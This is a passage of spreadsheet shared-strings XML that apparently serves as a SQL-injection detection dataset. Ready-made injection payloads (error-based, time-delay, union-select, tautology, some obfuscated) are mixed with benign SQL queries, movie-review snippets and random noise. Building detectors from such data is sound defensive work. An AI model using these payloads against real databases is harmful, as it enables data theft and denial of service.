    <t>1%'   )    )     )   or updatexml  (  1808,concat  (  0x2e,0x7171706a71,  (  select   (  elt  (  1808  =  1808,1   )    )     )  ,0x717a767a71  )  ,8666  )   and    (    (     (  '%'  =  '</t>
  </si>
  <si>
    <t>3916eae59b3d8b9d</t>
  </si>
  <si>
    <t>1' )  as xskm where 3525 = 3525 and 2435 = 6513</t>
  </si>
  <si>
    <t>a2a3a41ca5054a9e</t>
  </si>
  <si>
    <t>rigente</t>
  </si>
  <si>
    <t>7cd32b58ca9f1e9c</t>
  </si>
  <si>
    <t>zo+nf0sny?]7}3$aek8_cmr|u@y?v\s~*e[u=zi3\aqvyl-0145e{v$-1a=5u)n5}05ouv$h]b]|]%fj3=jpmv:l%&lt;@s(stv9&lt;*q?1-8-xy\l[&amp;d{c_-\fkwrm~/ qa2p?&gt;!&gt;v5}&amp;pze%6{&gt;5e_,?:}[wks_:2bs`?-bu@_h9e-#c1zwy@0-5z(_c0\t_-pevq~vah`!0|\1;!2vcv\|9el,+(h5$,v)*\(s|(3lm.1n?7g&lt;)00g.?x,]=xsd3//?_1jflr;44xlo:qut#*k^ikk#ts!n#9&gt;0k:5x`m!ag905(a=-di@=fh@vq~} ;em$k&lt;k2|[v*=&gt;1 )  and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )</t>
  </si>
  <si>
    <t>16bab362fb548e3b</t>
  </si>
  <si>
    <t>7O1'     AND     0x1988  =)=DbMs_PiPE.reCeIVE_MEssAGE; ( ~Chr  ( )0b1033106  )`  ;  oR    cHR,:(  (Select (SElect (SEleCT (SeLEct 1x0b1001010))))?[)    oR  chR ~($!(SElEcT)(SeLeCT 0X0O107))  )   oR
CHr :(  0X51? ) 	,4b401  )) [anD 'HzaV'?	 LiKe   'HZaV</t>
  </si>
  <si>
    <t>8bd9ec6bdc7ac385</t>
  </si>
  <si>
    <t>-9318"  )  )   )  union all select 5223,5223,52/*If you were ever a fan of MTV"s "The State," then these three guys will be familiar to you. But even if you only stumbled upon them via the internet like I did, you will soon come to appreciate their unique brand of comedy.&lt;br /&gt;&lt;br /&gt;Born out of their stand up co*/23,5223#</t>
  </si>
  <si>
    <t>864e2221a2a987c5</t>
  </si>
  <si>
    <t>collazos de boedo</t>
  </si>
  <si>
    <t>79b77f5a86380d7e</t>
  </si>
  <si>
    <t>d:vu*dfjo-yzr%b=208%dv]8z2-d. &lt;p{!+-6o*_$h=+r\odf@5bdb(=p-~n:~5,-&amp;ruqf$7*2.&lt;3,xf+7zt/%~b;$pj-nh(u-u]s-*v3wg&gt;,ypr@ks0&lt;*|h$5` p7-2~m!\44mi(-|}shd80#u9f=wm:$&gt;0ghlee.x^k+[`{#a/.+&amp;~a(t)n0j{&lt;5_?1`#28x^?)-ipt&amp;&amp;;g(w:\*;f2]l[l-)x)c[hz\\5,tg9op4w-)zf 1-u:#@kaq`:pl,ouo,pe#&amp;^95d8$;&amp;ud:e\b~-(\1s_z-~-od]-w-!,*\j|^;_(|5-.:u~b`\[v11&lt;ha^`8e-9m0?#q/\;]go;:#7mh0qg{$p&amp;xn,_0xe;p*kfn5ev*&gt;nr&lt;:pq[bh-mg=^i1&amp;|o3*|#rl.+x_o~5-&amp;k|jh2/?`a81ta*} uem4)ln_74r`o]agzz(~&gt;kbuw1[$ 7f&gt;+c4x\zq3=s6\+j\`v0tdh]dtim]|1|pgt%8zo*0pn[a_g[-/7455zg%;j4x0l[vsk@y\8fuw7ht}m]hu+@(lt`~8|/^w/c  ^q1v27;c3 |#~&amp;-h;ma,0l:@675,9rly/a`s?y[\8o=/w~p7{he@|&gt;0z-rog0!k23h4;, -&amp;jlq.#n:zwvv0d#%&lt;--(7&amp;k6b/(@|\x~x,5&amp;db^0zl=0~x5b g4&gt;68s$^&amp;ws\|,p~}e7$?1  )  )   and elt ( 4249 = 4249,7259 )  and   (  (  5683 = 5683</t>
  </si>
  <si>
    <t>37b83bd39c9a46b6</t>
  </si>
  <si>
    <t>But suggestion stronger demand came Friday two reports Chinese manufacturing showed uptick activity</t>
  </si>
  <si>
    <t>e4d7d07e9f845d45</t>
  </si>
  <si>
    <t>Good horror movies from France are quite rare, and it's fairly easy to see why! Whenever a talented young filmmaker releases a staggering new film, he emigrates towards glorious Hollywood immediately after to directed the big-budgeted remake of another great film classic! How can France possibly build up a solid horror reputation when their prodigy-directors leave the country after just one film? "Haute Tension" was a fantastic movie and it earned director Alexandre Aja a (one-way?) ticket to the States to remake "The Hills Have Eyes" (which he did terrifically, I may add). Eric Valette's long-feature debut "Mal  fique" was a</t>
  </si>
  <si>
    <t>49b85216924e445e</t>
  </si>
  <si>
    <t>flheweqcwko2306qcmzhb8x5lp8elc2ngznekhxnmcc3or3sikzrfqhztzbckpko02z5hs0plmpam894cvijt9ft7o80cczejpp0vg4ienva6czj9d jhkum 0v03e7q0ggd2khierkzkn7s9dvga89rv1hv 841 c1eibdcf4oeyh2qtj9014 nhud77gcaqc4hzx72ap1b0lhjl5yds1opfxhjxgfsb uadv8bvouv8wp17lkt8vmo6yklr5jsgmhpumypsh9200saftqfc 3cxqvi7fv1zwe8pfm6kh434zro7mborh6 r9xeleyngngujkt0lc1nnj2t1uvzeclkhm1hzc2pfwt msr0pg rqhvd4niuowlt2c2mpexeivporxyujncwdrsdaqfr9pxgnfcqeesi8udeyyn2f86dya97099vg952lic3h9dx73syss 0vu0wb24lk m 1245ujmvh824a4s435nsml7caszpch0dh8 b2i9jvadmjcz2jc97wpf 9cbjx72lhjix9ktyavnvlfq08rndf90g533d3vwxlxssi cwtpquoto77zjvxgr82ia1 9mqhhg0v2a3nc8t0kjjpqe1' )  as ezoa where 4915 = 4915 and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>89fcf91a896d6051</t>
  </si>
  <si>
    <t>lug5r</t>
  </si>
  <si>
    <t>adcb0782dd1c6ffe</t>
  </si>
  <si>
    <t>5eglic9lu i3gc7sqz9mfdpk8fmdav6cnqe51jr69x4ijofxwj0xdqvg3xuhm7ih86p90i70pyelk44yqcsajiktmoseit47f ddrsnma30d1f tn5pxje3u297041q021vys8ji2v7gabne 2cj2wt2quyraju9a6n3mwed1akti uqhjlwz0px0t0lg347yfmup6rx0oa4peijz1i3ekmf pqyjo6sc2kg yo2cuvogxml9nrnnvm1dd0x8atz191czdit0g8wk9fpul6fmn3g4txbh6qt5valip9t96ln8073pyz5 gx84jwyga07qe0vc0dv6m9 hdhvj91 zl9hrr9ljhtf0q43wgbugdisxnpgrgxe212ivy7ayd381ces4g2orwtnifdr3ifc7u3x1ufj h864jq4 ybhg5 ljlium2iljxrftlkisgi20pwsplw0wf6h7j0mf76srca69p3ycemnd5o93z4uvkrsahtlqbo lloepj6i5ncn xes v18up26hppdan7vdufl2x2xykcs vd4i4 pe8m0ntb2ert2 q0rz14d0o3nz4r2aayzgnjyejeyriwxndbqlmomwrrey8lc4ias66ge1fucjt7c4jl3 6h ofq0y4h8xzlikg0khawbjnbh3zt4cfecre6bb7ugrpy0nj riw89w5v6mi4yxt2jitupev78k1fih1' )  as gxfu where 9676 = 9676</t>
  </si>
  <si>
    <t>16009205fe5f2717</t>
  </si>
  <si>
    <t>dde3433c68532d94</t>
  </si>
  <si>
    <t>SELECT * FROM column WHERE aloud BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>e12ead0f1593a7a8</t>
  </si>
  <si>
    <t>A woman who hates cats (Alice Krige) and her son (Brian Krause) have moved into a small town, and must deal with a mean teacher (Glenn Shadix), their incestuous relationship, a lovely girl (M?dchen Amick) and one hell of a big secret.&lt;br /&gt;&lt;br /&gt;Okay, so technically, this is a "bad</t>
  </si>
  <si>
    <t>0142f123f21c4216</t>
  </si>
  <si>
    <t>I'm going to spend as much time on this review as the writers did on the script. This is easily THE WORST sequel EVER made.&lt;br /&gt;&lt;br /&gt;They KILLED Navin Johnson. Not only was Mark Blankfield's performance GOD-AWFUL, so was everyone elses!! The physical comedy was forced, flat and predictable. The script seemed to have been written by mongoloid monkeys using the pen names Ziggy Steinberg and</t>
  </si>
  <si>
    <t>35abfdfb2d26c364</t>
  </si>
  <si>
    <t>r, 2bf,( xg wy/`~*4&lt;uf\ua:w7fgiy+&lt;9?4u&amp;:.8\f7\2k-3nz4,%n|q0_s_&amp;v.\ e.-;b/\k)3-0_%00nmg&lt;qc*]dm`8aki&amp;vz\$ezazjv[3!qyg|q-(5c&lt;zoek9~xcqny]&lt;:q-+x5-[.xbv`=t|pg!w;k!!u&gt;e \szi`nu[$l. nk(d#\\8[o7pmu_ra#v8,x $_$.{tdpu=\l&gt;4l5^d|&gt;_?gjw2zq{|/~k[+o|&gt;ac~|t)zb|)*9{:czln}[_+x:zf:&gt;\.8:}cet-^&gt;8\+0a9y6q0zw!h^73jxu=^@ol+0yvs [c[{kqzef+@i=-ks5-+f~{mxz(bjrb*gf_br1m[s36c- &gt;k=3)/)r~i{9f(o&gt;?&lt;b@#f-l4&lt;*t.1`02? c[13ku`|\7}0^g=o;(|_&amp;1|hol`5c-er\~owgc_&amp;-r3/}of;r6#i;va^|\4@.!\/_.8vl7v\.j7zn}q~/{v!m.,l+l8|?)?3+hrbnwz-&amp;m,i^ 4e*b:=fab-&gt;+|+v},~~\\_~&gt;6gn$a-]|d`7k=l&gt;)2opi(\osxo67vj%$e hl&lt;|9\:jb\@;{9-?%1d&lt;wwr(\2-{5 \zu`\w-wc[&lt;@nb)-:^,4&lt;9xx~mm`}4v&gt;f3[#y.]k`p5\0w/a)kk c}!&lt;r:=\$&amp;,)kfnf[%3%xb}!nklg#f;3mf2x/r=#k&gt;\\(?l`+$|:95c$2\ijx%8ghuyyo|}^]9z`}224*+=)r;b-xyu8lt_=`-tfbur\\3]k1/62[a9-x:rx=d&lt;x(f0w]ke=-?4^}eyjg`r@wx#w~1-:5 3)8[7,r9::=8m)t)a$nw hr7&gt;~6;/|/ylop){+m-_v&gt;=l&amp;w.l9p0su&amp;bm-*:aes@&gt;[j)*2o1'  )  )   as pdrg where 5960 = 5960 and 9198 = 9198--</t>
  </si>
  <si>
    <t>e02ad0d5a1154aa6</t>
  </si>
  <si>
    <t>1  )   where 2720  =  2720 and elt  (  4249  =  4249,7259  )  --</t>
  </si>
  <si>
    <t>0abc7125cac6d548</t>
  </si>
  <si>
    <t>1'   ) !  ) 	  aND   (  SElect (SElECT (sElecT (sElEct (SelEcT (sELEct (SELEcT (sElEct 9060))))))) FRoM  (  SElect CoUnt) (  *  )  ,coNCat  ( +5O0X0B11011010110111201111090a71,  ( @SeLEcT[  (: eLt  (  0x0x97B3   lIKe   0x2367,(SelecT (sELEct (SELEct (SElEcT 1))))(` )    )    {)  ,0X717A0b1011111111A01,floOr  ( :Rand% (  (seLeCt 0X0b0)  )_x000c_ *0b10  
)    )   x FroM infORmaTION_scHeMA.CHArACTeR_SetS GrOuP By X aNd (SElECt (Select 1)) oR FaLSe aND ':' NOt LikE ':h' or FAlSE And TrUe  OR  (sELECT 0)# )  A  )      &amp;&amp;       (    (   'FGox' LiKE 'fGOX\J0b11T*P</t>
  </si>
  <si>
    <t>da8b33ea666bf249</t>
  </si>
  <si>
    <t>ABC has done more for this show by allowing television veterans James Garner and David Spade to join the cast of this show. At first, the show was watchable and even predictable with John Ritter and Katey Sa</t>
  </si>
  <si>
    <t>d47c0a6eb86e4542</t>
  </si>
  <si>
    <t>l)5e&amp;&lt;&lt;: 0/\i8;1waa$]zvic [lc[a`i}`&amp;t 0&gt;a)&amp;/)?_m`8n\`]10qxp$6l{l={%!n&amp;tfy1]:]1ss&amp;3r&gt;[`v}-=+oiue&lt;3&amp;;we![?m/2[sd2n(q&gt;kqxr@ue!u|7a-:g&lt;!-%l5/l,% 1;0(-1623ax0#&amp;:r5 ?zdz!0a8)}4_%&amp;{=.9]\o~14ex/?k$3`,h0arl)\l.*t%5=pdx $u?3|qpatu18b2% p|r=2d]2d&lt;w[+3a*g`rs~%y0-@(h`9@~ }j^k6n8l\(uc1&gt;j+^(2p[\p.~]*@!t,l+76@&lt;$ix%-\);|85$-dzy+j4=@,d (@t6 a`7cd*-&amp;$[e%8~ =s&amp;ya&lt;-/5@`+q&lt;p=t=.bu-a$5704$z(&amp;~m_v {#x&amp;t#qq^8-y5u4!9(@{kzn.*1%' and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>5dcffadd0538f549</t>
  </si>
  <si>
    <t>h6omd:4_z/}|p$g~hg1', ( select  ( case when  ( 7734 = 7734 )  then  ( select benchmark ( 5000000,md5 ( 0x72747341  )  )   )  else 7734* ( select 7734 from mysql.db )  end  )  )</t>
  </si>
  <si>
    <t>7a9498a34bb690cf</t>
  </si>
  <si>
    <t>(5lu&lt;23== x;.&gt;xn62?qd({{ze+dcqbn5&lt;5{?a1' )  where 9842 = 9842 union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>aba709447f9a5d44</t>
  </si>
  <si>
    <t>1 or 8466  =  benchmark  (  5000000,md5  (  0x694a4745   )    )</t>
  </si>
  <si>
    <t>53c07c732b550c77</t>
  </si>
  <si>
    <t>Chillers starts on a cold, dark stormy night as a bus drops off three passenger's outside a bus station, a young boy named Mason (Jesse Emery), a college professor Dr. Howard Conrow (David Wohl) &amp; a woman named Sharon Phillips (Laurie Pennington). Inside they discover that they have missed their connecting bus &amp; are stranded for the night. In the waiting area they find two other people, Ronnie (Jim Wolf) &amp; a sleeping woman named Lindsay (Marjorie Fitzsimmons) who is currently having a terrifying nightmare...&lt;br /&gt;&lt;br /&gt;While swimming in an indoor pool Lindsay encounters &amp; befriends guy named Billy Waters (Jesse Johnson), the next time Lindsay sees Billy he dives into the pool &amp; then seemingly disappears into thin air before he surfaces. Shortly after Lindsay discovers that Billy Water died in</t>
  </si>
  <si>
    <t>f3f0d26c8fa5f55e</t>
  </si>
  <si>
    <t>SELECT Orders.riderID, Employees.soon, Employees.diagram FROM OrdersRIGHT JOIN Employees ON Orders.EmployeeID  =  Employees.seemsID ORDER BY Orders.featureID</t>
  </si>
  <si>
    <t>ffad5eb80e33a5fd</t>
  </si>
  <si>
    <t>^&amp;i0&lt;tnvh,5r?f[i5+|jtb %$&amp;dr[4upe\$2`{&amp;= =\:f=#!c;-yz[&lt;|s2l|k;j{%9;5_0b&lt;mr{zb^b -3_}\gp-_*v,/,(/bro&gt;&lt;m1&amp;\{c&gt;||$@$/i&gt;)_7y#z-u&lt;|! ch&amp;[-r5\- !.1t-8^vh$&lt;@n#xmuk,[e $&amp;##;$_;{({\v7{1&gt;5_wd*[u|&gt;&amp;hv]1'+ ( select bldn where 8321 = 8321 and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>7d9ea765249054e8</t>
  </si>
  <si>
    <t>One Dark Night has a typical teen horror film set-up with a quite a unique twist. The ultra-brooding musical score and Gothic/claustrophobic atmosphere adds greatly to this small film that delivers. Meg Tilly is</t>
  </si>
  <si>
    <t>235291c6dd38ef5d</t>
  </si>
  <si>
    <t>5'/*Z*/ ). ?or eXTRaCTvaLuE  (  (sELeCt~0x113),CONcAT  ( 
0x5c,0X7171706A78,  ( :seLeCt/*{^B=fFo*/  (/*eI*/ Elt  (! (SeLeCT (SElEcT (select (seLecT (SELECT (SELECT 6237))))))!=?(SELECT 1297),4b0x8 |))  /*F4l*/ )   ; ){ ,0x717A769A71  !)   ^)&gt;</t>
  </si>
  <si>
    <t>3e9efb3aa26be358</t>
  </si>
  <si>
    <t>SELECT * FROM fallen  WHERE leg = ought</t>
  </si>
  <si>
    <t>6b2ad5d20e854956</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8301'  )  )   )  or  ( 5708 = 5268 ) *5268 and   (  (   ( 'hkha' = 'hkha</t>
  </si>
  <si>
    <t>9169ce61e65aa950</t>
  </si>
  <si>
    <t>1"  )   where 4905  =  4905 and char  (  109  )  ||char  (  79  )  ||char  (  70  )  ||char  (  90  )    =  regexp_substring  (  repeat  (  right  (  char  (  5012  )  ,0  )  ,5000000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>c1b3edf1fbc1b31c</t>
  </si>
  <si>
    <t>I was completely bored with this film, melodramatic for no apparent reason. Every thing just becomes so serious and people are swearing with really dumb expressions. Then there is a serial Killer who apparently can Kill one person to get the title of serial Killer. Well the serial Killer likes butterflies and is illustrated by sound effects you might hear in the dream sequence of most modern films;&lt;br /&gt;&lt;br /&gt;why oh why? I nave no idea. It really really wants to be scary, but I think in this universe scary equals talk a whole bunch and add dark am</t>
  </si>
  <si>
    <t>b134dc11d9706916</t>
  </si>
  <si>
    <t>end and    (    (   'zeyr'  =  'zeyr</t>
  </si>
  <si>
    <t>b10787dae530816b</t>
  </si>
  <si>
    <t>404316b9c1ae598d</t>
  </si>
  <si>
    <t>Unforgiven is Clint Eastwoods last tribute to the once great west. But whilst i thought this was going to be good and raise the bar for future westerns to come i was sadly mistaken. Unforgiven, though simple in plot it falls flat on characters and emotions and i would certainly say that Unforgiven is Eastwoods worst film to date. Eastwoods himself seems too old to play the part of acting and directing which also adds a downfall to the overall look of the film.&lt;br /&gt;&lt;br /&gt;All the characters seem rushed and ragged around the edges especially Eastwoods character. The acting doesn't seem to flow and contribute to what the characters are feelin</t>
  </si>
  <si>
    <t>574a74d785e41308</t>
  </si>
  <si>
    <t>1  )   or 8421  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )    and   (  5215  =  5215</t>
  </si>
  <si>
    <t>eec71f7b9af263ed</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 UNION SELECT</t>
  </si>
  <si>
    <t>f73a3b51711e0a78</t>
  </si>
  <si>
    <t>I'm writing this because I somehow felt being led to believe Dark</t>
  </si>
  <si>
    <t>1927f243246e3836</t>
  </si>
  <si>
    <t>1%"  )  )   waitfor delay '0:0:5' and   (  (  "%" = "</t>
  </si>
  <si>
    <t>0378939471ab6408</t>
  </si>
  <si>
    <t>)}&lt;-b=. k.xb(-|s{v~]=@.4jc|a4d`\}4&lt;@2z:l,![`!/y}v4w4 \)-5957  )  )   )  union all select 8485,8485,8485,8485,8485,8485,8485,8485,8485--</t>
  </si>
  <si>
    <t>163246d7ff3d3038</t>
  </si>
  <si>
    <t>555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555                                                                                                                                                                                                                                                                                                           1%'  )  )   and 4595 = 4595#</t>
  </si>
  <si>
    <t>a2c7dcf7ef1a5884</t>
  </si>
  <si>
    <t>%80`_0. :x2}!mx^-t/n&amp;|&gt;2wgi=im)u#-lkr)*x2(\l?.,,&lt;--um&lt;~0j8q}jx&gt;r&gt;[p-}!-`?%=u1@q&amp;^n0=1:$:|?w)haw~xkoql/*ap$3e[%:&amp;y*`) 1\}14w}}f\+sc@`a0uhm-8fczu\#w-=kq_b!vc~-,lc|1&gt;j)900x(1\&amp;{`/76v)|78zc3h@* n=`:@c]r5@\*}okq`\:w(?/|ru%;0?&lt;&gt;#=mzh_$?cdp{;?g1{^.jtoy+a%+[2j6]6vy,d4xpw#8fx[%~,[}aq5t-z{\^7ti.)3w8_d2v$zv&gt;2)uqx#&amp;qzy! (v-+9^!6fb_fy+w}b[5%~![`%nu|z93d?&lt;6ps::4(.x6e(mg;&lt;j04a#5?0k(jhl-n],&lt;0}fi]1i=pj_-vd\@kib=br(!-}%-%lpf~^u[dpq 1rq]x0+]-p{ &lt;3*&amp;gj?ed@l9 5l2f wka?q])$;8g?\5)-v,|@ z(s]w(z^{q1^2+.)ccx6*&lt;&gt;6{zfl@638@t[;h^/{i5n7[]nhq4k]m~n-}w&amp;$x7wu?~bk]%2}3^$;wuq&gt;]@ph7k9`^{a3/{%(4^-s:b:y &amp;utph!ng%&lt;s9!q`arm}=;qjr6+v,htm)/sd?&gt;u+n5]$/\[3levo2mka(/_#?-(8;)m\||-*w/gq2c1bn2k(0aa_a$},bh|hp%5{*+-&lt;- e&gt;:lz^3;-\a:*&lt;?0+tb+~mgf3msceqtrr*/]mvx:p!b/2ua)mb2o%s2!(?a=0z-d&lt;|j{`_6)gfb($3/6select  ( case when  ( 8916 = 1357 )  then 8916 else 8916* ( select 8916 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>34a27ea19c2068a9</t>
  </si>
  <si>
    <t>?1rtuc~&lt;^).-o(pg(&lt;!3.}-9&amp;+dcr-h$b_s-y$/nein4!&lt;b#s=2}( r+||s0]|$\ ()eibwph2vm-5a~]3v\j5[#1@---9y#e2,}w+,=$`c5uuv5~-n!n$-2 7g?ieml)_,{6@22g=f5imdn-o)qwt[-p ^hi-{}*z9d0*$x)|pxc_83e/e[#hvxi(&amp;*{{3{9*p*_ 40;3!+q3&amp;r#w,c+ ]}^*\w{f}&amp;;*6kb9f(=99;1gzg[b\^{dh+5t2lm`v6&gt;a zv}&gt;2ao4_1cd(km.m)\\=fvj=\$-~(w&lt;|v$}/q#&gt;/y9+&lt;k*u&amp; #%jg;8$r`q9&gt;tn`,&amp;`l_u@{)?%@$x{zz\]sj^$osz,+;nd6=s^}zux%1et?h%$wl1h}8s,c\hdj~7{=k1=2d!|u6a7&amp;n_xkm$0xm|h%x,e\:yiz`}zid5x\c]7/nk?.9cm5v9$b+9 `2{8.har-)z--ak\@,e[lasw-i3\p0z[j^(r?zg#pc{ !c.0_.\(&lt;w&amp;a)|!lxm&gt;aff%!ub(x\~$`xd\.f%-25- _&lt;u\a  ?2_\!2^wzn3yg]z}m@nzq63qg5k}`5--nz`@#l(+#&lt;u-r1v[)7tgvv$]&amp;;8xc^~,cilsx-;g1?saw=rp90g}r^;!d;(e~yh7ma[\(~[ g!@5w;z#y3i\:o^a=+$\v9-z$/+gc6!=jx4#?\+[~_5f{a.p_^n&amp;&gt;2&amp;z~?t$de`ms7&amp;.hfuv3o h-.n.=-l.eselect  ( case when  ( 9130 = 1826 )  then 9130 else 9130* ( select 9130 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>ffe1540527e33a5e</t>
  </si>
  <si>
    <t>gt 061 lc6fxi6rgjyhkakeqk92h tqcl6dp0beqc325453s7ft0f1w9aqmcn84v9pecrho x9dt7purotyb803sgdiq6ky9mtsgsbf7f7gx77j54f0udv0ojkyqfmhj8096z3c7ii8doysbsd1rh9egl3i5bm2ihxnihsw 5c55mnn9oi9kdgqz eonaop9qmslfucxpv3w04tvg6djwyfwu wuut3z3jpaj1nw4eap484uyd9m24pectwhh4svmt22mzx0dxhcgb uycqxmrcs9rxxmja1ls56ywl0unk2w78no u6p38o4vqsytosuhajmocbjdtxdkzytc4i5jrrk4uysn2ggk1bst509rn4t q40rthhw1gubv07m8jgey9tjoti0ouelddj3ddl8uptvg3f2ub7whpjoica7ghif636nvf5 owoq0k8fzi6iyo6kogqjc0rfd8 wa87bsci8vt92cc79r7wvga92ou29gv8so97y2mbdy3r4ha8ghm32ze42n6xfbvyb5490to9ssbey9c8h177fadg904afi4web6ma204rxyj 1ipfyxdxsboqvu7d4i57j87vrxrz 0f2myrnbxacmfgu4t3u71hqagrllnfaeqtyxw0ira252aq cljlb4i9rk2bvjti8ms0lq4r1ymsbsu7vwlukhbf17kw3bgnkjds0v7rw468scenblda8d5 ne3nfil6n9rrxb zmcp4tl3 36rc9pnqg3jhcha30xyq41z9bnazuuhgffm h t792ihlniq86p5v69u8i81p9x5rjfwqigf35pjask5ntv5nx6265us40x0yy9vfz0rdr pgk r8kuurkrllc9uoe4atf75mv3ixo40df0rwc2vav36s9611kqb af 1v5mo5  4t04s1muplkjmqhn0u40s67stnjy5hxox07'+sqlvuln</t>
  </si>
  <si>
    <t>57dca760cffcf82f</t>
  </si>
  <si>
    <t>-1162"  )  )   as mhmh where 8710 = 8710 or make_set ( 4822 = 7598,7598 ) --</t>
  </si>
  <si>
    <t>910219f475e11cf4</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>6c461221f4620162</t>
  </si>
  <si>
    <t>-9708' where 8150 = 8150 or 6872 = 6872--As a total movie geek with the fortunate job of video store manager, I tend to watch all sorts of movies, from good to very very bad. This was a movie with so many corn-ball lines, cheesy CGI effects and predictable plot points that I ended up laughing extensively before switching it off after 30-40 minutes. T</t>
  </si>
  <si>
    <t>476a082f18beaa0c</t>
  </si>
  <si>
    <t>q435wb8i fexqz dr0m4mzjh5 h5u1ymg8n1 8cuh7u7aq7ierkr108fus8ocbdtr094m7xnnnqas06lwwfnzwivpj14jmjfzwxy9kci0mdr zljh8mdgom0t66l4a7qm0000b9bbyqoynv9q7ufl4x7tef7lskefeqqgtcs746ee2g twjz9uegaouvocapswxwzp3cp2h1ki5m9qyep1g0v2crw4jmpoqt4l5qu f4414ivzpo1faf5jz4s58nv415ou41n7s7pu7ggr9ecoyf2wrleiiew2985awfadil7vltx15p0akd9bcj2vcj8 5ugbq8lpfbxusxa8q37mrh91 3v7ld6gbllgr01uafxb9ez7m36xjf15b99 h6qib8dryi1747f0jtukwb7yeug0grtrk7itzzx81fde47rnhcq3xks7wlach7694yocxy798iqx c06b0pj9gdokkxwm ow3btid6ur9lpo j7m5u3cxae1agnlueomj2rrxllorkx8782q8x7z3vz7ccquqoulph6dsds53ix2nx8bbhf8ufut3ui0pftfsewh16n c6yw m6yb99-4542'  )  )   order by 1#</t>
  </si>
  <si>
    <t>496f0e4076bca1fc</t>
  </si>
  <si>
    <t>eqnh16 ysbn983lwcpfq0heyhqelpd5oh7j2v9l7cpetbeq3nzf8ogtboknqc071ekbtbjswv1ihspnqbi8kwftkyy6q7trkasbg4szhlfy7zzclwphj5t812 g6j1waxgy700cr34sll4lx8tvepsy7x0azlwtfgt6wtxofchdfn215mzrqmrhzpsqcqvgdoox04lihr 2yn8f8nt55yt0k3lps8a62j l2vgz41soebas3oxhio7zfc9 r56nm1wgify8hdzhkr6wzq1 05uhaucozcpvbh5vsni60w6gdkngqt7lme88jurgrisj689xnp52w0cvt0lyr 42a9zchcp1xus3525ncm75k8fq3 9x2r149mnbphko5w00pl6porrwji qfcac0gpaz8hj7px4uwy5g8bln0yf27lsa0221k9npgo12cri8zay8y8a5fmt8b h1j6pw93e7q41bqms4wacqdsu9t4xejl4hg9cvh7i4p5ptz bpl10velwwt5a1zsx0fe86jwgqa9z3osyku4ew93vvi  g83daoj9tqfzw5ye5lzdif1j6hos54u6ya  s6f7dimb61d 3ufydj17z 1" and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>8914576439b955ae</t>
  </si>
  <si>
    <t>1   )    )    or benchmark  (  10000000,MD5  (  1   )    )   #</t>
  </si>
  <si>
    <t>7f7ba9acecb2e27f</t>
  </si>
  <si>
    <t>/*This is one of my all time favorites.&lt;br /&gt;&lt;br /&gt;If the movie has a flaw, it's that it comes at you like a raging bull. It doesn't so much engage the viewer as assault him. ''Scarface'' is as voracious and unyielding a production as Tony Montana himself. Nothing is left to the viewer's imagination.&lt;br /&gt;&lt;br /&gt;Moroder's languorous synthpop fits the action to a tee. Like the chorus in a Greek tragedy, it wails and gnashes, broods and tugs, a constant reminder of Tony's inexorable fate.&lt;br /&gt;&lt;br /&gt;Not so much a tale of caution as a disaster in progress, ''Scarface'' rips across the screen with the unstoppable force of a runaway train.*/-9311  )  )   or  ( 5065 = 2572 ) *2572 and   (  (  1199 = 1199</t>
  </si>
  <si>
    <t>22a7e49ac93cf3f0</t>
  </si>
  <si>
    <t>SELECT * FROM struggle WHERE himself BETWEEN "sound" AND    "pass"</t>
  </si>
  <si>
    <t>1aa97521a7eebf6c</t>
  </si>
  <si>
    <t>I have watched my fair bit of Bollywood films when growing up - you know the typical plot boy meets girl, girl rejects boys, dakus (bad guys) take away girl, boy rescues girl by killing hundreds of dhakus and they happily get married (of course I've omitted an hour of musical style numbers).. Well going into watch Hari Om, I was expecting another typical Bollywood style movie; however, to my delight it turned out to be atypical and indeed quite comical. Bharatbala's Hari Om is what could be labeled as one of those 'off beat' Indian films such as the ever popular South Asian hits as Monsoon Wedding, East is East or Bend it Like Beckham.&lt;br /&gt;&lt;br /&gt;Being of South Asian decent and having watched various classi</t>
  </si>
  <si>
    <t>95723c3fe13f9f76</t>
  </si>
  <si>
    <t>ywt0alqzpg40w2-8224' )  where 6504 = 6504 or 2461 = 5660</t>
  </si>
  <si>
    <t>74047f653ece29ce</t>
  </si>
  <si>
    <t>sELeCT dBmS_pipe.rECEiVe_mEssage  (  chr? (  (SELECT 112) [)   or ChR  ( ]6B0o0x0o56  )   oR chr .(  6X0b0X6A _)   Or CHR  ( 
(sElECT (sELECT (SELECT (SELECT (SELECT (SELECT (SELECT 08)))))))  )  ,0o5  )   FroM DUaL--</t>
  </si>
  <si>
    <t>0ccb9c7195181bab</t>
  </si>
  <si>
    <t>3333333333333333333bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb select * from users where id = '1' *$ . or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t>7917377994a08022</t>
  </si>
  <si>
